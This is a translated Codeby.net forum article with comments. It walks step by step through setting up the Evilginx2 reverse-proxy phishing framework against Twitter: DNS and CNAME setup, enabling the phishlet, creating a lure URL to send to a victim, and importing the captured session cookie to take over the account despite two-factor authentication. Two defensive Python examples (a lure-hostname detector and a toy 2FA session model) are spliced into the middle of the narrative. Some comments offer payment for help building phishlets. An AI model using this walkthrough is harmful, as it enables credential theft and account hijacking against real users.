Article: Evilginx2 - Phishing. Bypassing 2FA.

kluster
Premium
02.01.2019
Hello to Codeby.net forum guests and members.

In this article we will talk about phishing and bypassing two-factor authentication with the help of a great tool, Evilginx2. I already wrote about its previous version; anyone interested can find that article. It turned out weak, though, because there was no great desire to dig deeply into the functionality, so only a simple overview was released.
The second version of Evilginx attracted me with its ability to help pentesters and other good people bypass two-factor authentication and obtain account data from our target's accounts.

So, let’s start work.

Evilginx2 is a man-in-the-middle attack framework used to phish login credentials together with the session cookies, which in turn allows two-factor authentication protection to be bypassed.

The tool is the successor to Evilginx, developed in 2017, which used a custom build of the nginx HTTP server to provide the man-in-the-middle functionality as a proxy between the browser and the phished website. The current version is written entirely in Go as a standalone application.

Evilginx2 implements its own HTTP and DNS servers, which makes it really simple to set up and use.

As the attacking system I use a fully upgraded Kali Linux, and because Evilginx2 is written in Go, install the latest Go release. Download the archive:

Code:
wget https://dl.google.com/go/go1.11.5.linux-amd64.tar.gz

And extract it to the specified path:

Code:
tar -C /usr/local -xzf go1.11.5.linux-amd64.tar.gz

Add the following to your .bashrc (or another shell profile) so Go can be launched:

Code:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Now we can install and build Evilginx2:

Code:
go get -u github.com/kgretzky/evilginx2
cd $GOPATH/src/github.com/kgretzky/evilginx2
make

And perform a trial launch without any settings:

Code:
evilginx2

Moving on to practice.
Make sure no other services are listening on TCP 443, TCP 80 or UDP 53:

Code:
netstat -tplnu

At launch, Evilginx2 will tell you if it cannot open a socket on any of these ports.

By default evilginx2 looks for phishlets in the ./phishlets directory and then in /usr/share/evilginx/phishlets/. If you want to specify your own path to the downloaded phishlets, use the -p <phishlets_dir_path> parameter when you run the tool.

You can call up the help:

Code:
evilginx2 -h

There is also built-in help inside evilginx2.


Moving on to configuring the tool before the attack.

Register a domain and, in the registrar's admin panel, point its name servers (ns1 and ns2) at the IP address of your Evilginx server.

Set the domain and the IP address of your server with the following commands:

Code:
config domain yourdomain.com
config ip (your ip)

Now you can configure the phishlet you want to use; in this case it will be the Twitter phishlet. Set a hostname for the phishlet (it has to contain your domain):

Code:
phishlets hostname twitter twitter.com.maligncorp.com

Then we need to get the CNAME records for the Twitter phishlet and set them in the domain provider's admin panel.

A canonical name (CNAME) record is a type of DNS record that binds an alias to the real (canonical) domain name. CNAME records are usually used to bind a subdomain such as www or mail to the domain that hosts that subdomain's content; for example, a CNAME record can bind a web address to the web site of the example.com domain.

Code:
phishlets get-hosts twitter

Add these names in the control panel.

Enable the phishlet:

Code:
phishlets enable twitter

Wait for the certificates; if everything is fine, we will see a message like this.

Set a redirect to Twitter's real domain:

Code:
config redirect_url http://twitter.com

Then we need to create a lure, the phishing path to the Twitter authorization form, like this:

Code:
lures create twitter

Copy the path and append it to our phishing link; it should end up looking like this:

Code:
https://twitter.com.maligncorp.com/jNvKjIkI

Share it with the victim and wait for a result like this.

For the victim, the whole process looks like this:

Yes, I know the link looks "weird" (in its defense I will say: HTTPS), but who looks at it? =) In our case...
The login and password are entered... aaaand
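
The lure above lives at twitter.com.maligncorp.com: the brand's domain appears as the leading labels of a host whose registrable domain is something else, and the HTTPS padlock says nothing about that. As an added illustration that is not part of the original post, the following Python check splits a URL's hostname into its registrable domain and subdomain labels and reports when a watched domain is embedded in the subdomain part, then runs the check over a few constructed proxy-log lines. The watch list, the log lines and every hostname other than the one from the post are constructed for the example.

```python
"""Added example, not part of the original post: flag lure-style hostnames
where a watched domain is spelled out inside the subdomain labels of a host
that belongs to a different registrable domain.
"""
from urllib.parse import urlsplit

# Constructed watch list: domains our users are expected to log in to.
WATCHED_DOMAINS = {"twitter.com", "google.com", "microsoft.com"}


def split_host(host: str):
    """Return (subdomain_labels, registrable_domain).

    Simplification: the last two labels are taken as the registrable domain.
    Production tooling should use the Public Suffix List so that hosts under
    suffixes such as co.uk are split correctly.
    """
    labels = host.lower().rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])


def embedded_brand(host: str, watched=WATCHED_DOMAINS):
    """Return the watched domain found inside the subdomain labels, or None.

    A host whose own registrable domain is watched (mobile.twitter.com) is not
    flagged; only hosts that contain a watched domain under a different
    registrable domain are.
    """
    prefix, reg = split_host(host)
    if reg in watched:
        return None
    # Test every contiguous run of subdomain labels, e.g. ["twitter", "com"].
    for start in range(len(prefix)):
        for end in range(start + 1, len(prefix) + 1):
            candidate = ".".join(prefix[start:end])
            if candidate in watched:
                return candidate
    return None


def check_url(url: str) -> dict:
    """Classify one URL; accepts full URLs or bare hostnames."""
    host = urlsplit(url if "://" in url else "//" + url).hostname or ""
    _, reg = split_host(host)
    brand = embedded_brand(host)
    return {
        "host": host,
        "registrable_domain": reg,
        "impersonates": brand,
        "suspicious": brand is not None,
    }


# Constructed proxy-log lines in a minimal "client method url status" shape.
SAMPLE_PROXY_LOG = """\
10.0.0.12 GET https://twitter.com.maligncorp.com/jNvKjIkI 200
10.0.0.12 GET https://mobile.twitter.com/home 200
10.0.0.31 POST https://login.microsoft.com.example.net/common/oauth2 200
10.0.0.31 GET https://www.google.com/ 200
"""


def scan_proxy_log(text: str) -> list:
    """Return (client, host, impersonated_domain) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines instead of crashing
        client, url = parts[0], parts[2]
        result = check_url(url)
        if result["suspicious"]:
            hits.append((client, result["host"], result["impersonates"]))
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("client %s reached %s, which embeds %s" % hit)
```

The two-label split is the weak point of this check: with the Public Suffix List in place of `split_host`, the same label-run search also catches hosts under country-code suffixes, and a real deployment would feed it the hostnames from proxy or DNS logs rather than the constructed sample.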


Check the intercepted sessions. If the password was entered correctly and the login succeeded, the "tokens" column of the table will show the value "captured". That means we have the cookies too!

To avoid entering the login and password, let's use the captured session to get into the victim's account:

Code:
sessions 7

Copy all of this, open twitter.com in your browser and use the EditThisCookie add-on. Import the data and reload the page.

It works. Now a little background on two-factor authentication:

Two-factor authentication is a way of authenticating a user to a service (usually on the Internet) by requesting authentication data of two different types. It provides two levels, which means more effective protection of the account from unauthorized entry. In practice it usually looks like this: the first barrier is the login and password, the second is a special code that arrives by SMS or e-mail. More rarely, the second barrier requires a special USB key or the user's biometric data. In short, the main idea is very simple: to get in somewhere you need to confirm that it is you with two "keys", one of which you have and the other of which you hold in your memory.
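
The post imports the captured cookie into a browser and gets in without the login, password or SMS code. As an added illustration that is not part of the original post, the following Python models why that works: a toy service checks both factors (a password and an RFC 6238 time-based one-time code) exactly once, at login, and then trusts a random session cookie for every later request. The user, password, clock value and service are constructed; the TOTP secret is the RFC 6238 test-vector secret so the generated code can be checked against the published value.

```python
"""Added example, not part of the original post: why a captured session cookie
sidesteps two-factor authentication. Both factors are verified once at login;
every later request is authorized by the session cookie alone.
"""
import base64
import hashlib
import hmac
import secrets
import struct


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for a base32 secret and counter."""
    key = base64.b32decode(secret_b32, casefold=True)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, now: int, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): HOTP over the 30-second window."""
    return hotp(secret_b32, int(now) // step, digits)


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class ToyService:
    """Constructed login service: both factors at login, cookie-only afterwards."""

    def __init__(self):
        self._users = {}     # username -> (salt, password_hash, totp_secret)
        self._sessions = {}  # session cookie -> username

    def register(self, user: str, password: str, totp_secret_b32: str):
        salt = secrets.token_bytes(16)
        self._users[user] = (salt, _hash_password(password, salt), totp_secret_b32)

    def login(self, user: str, password: str, code, now: int):
        """Check the password and the current TOTP; issue a cookie on success."""
        record = self._users.get(user)
        if record is None:
            return None
        salt, pw_hash, secret = record
        if not hmac.compare_digest(pw_hash, _hash_password(password, salt)):
            return None
        if code is None or not hmac.compare_digest(code, totp(secret, now)):
            return None
        cookie = secrets.token_urlsafe(32)
        self._sessions[cookie] = user
        return cookie

    def whoami(self, cookie: str):
        """Authorize a request by cookie alone: no factor is re-checked here."""
        return self._sessions.get(cookie)


def demo() -> dict:
    """Walk through login attempts and a later cookie-only request."""
    svc = ToyService()
    secret = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"  # RFC 6238 test-vector secret
    svc.register("alice", "correct horse battery", secret)
    now = 59  # constructed clock value; RFC 6238 lists 94287082 for this instant

    no_code = svc.login("alice", "correct horse battery", None, now)
    wrong_code = svc.login("alice", "correct horse battery", "000000", now)
    cookie = svc.login("alice", "correct horse battery", totp(secret, now), now)

    # Any client that presents the cookie later is treated as alice; the
    # service cannot tell it apart from the browser that completed 2FA.
    later_request = svc.whoami(cookie)
    return {
        "code_at_59": totp(secret, now),
        "login_without_code": no_code,
        "login_with_wrong_code": wrong_code,
        "cookie_issued": cookie is not None,
        "later_request_as": later_request,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

This is exactly the gap the EditThisCookie step in the post exploits: once the real site has issued the cookie through the proxy, the service trusts the cookie, not the factor. The defensive consequences follow directly: short session lifetimes, re-authentication before sensitive actions, and origin-bound authenticators (FIDO2/WebAuthn), whose assertions are tied to the real site's origin and therefore cannot be completed through a lure hostname such as the one above.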

Let's consider the situation where the victim needs to reset the password.

The SMS from the service arrives and the special code is entered.

Our target resets the password. In this case we don't get it; our profit is the cookie.

Copy the data for import into the browser.

Well done! You are the best!


That is all I wanted to tell. Evilginx2 is a really cool tool; I advise you to study the contents of the /phishlets directory. I am sure you will find something for yourself.
This is not a complete guide, but I touched on its most powerful side.

P.S. The YouTube overviews are not so good; many details are missed.

Specially for CODEBY

Source (Russian original): Evilginx2 - Фишинг. Обход ДФА

The Codeby
ООО Кодебай
30.12.2015
Great job! In gratitude - premium status for 1 year (for a start).
 
t0gl
Well-known member
20.06.2018
You have made a mistake /usr/locale
and first evilginx
 
marco matteo
New member
03.04.2019
Hello, I need a little bit of help to finish one of my phishlets. I am ready to pay for your time/work; please add me on ICQ 10777333
 
hardknocklife
Member
21.08.2019
Guys, who can help me set up Modlishka effectively and also teach me to create new phishlets? I will gladly pay for your time. Thank you.
 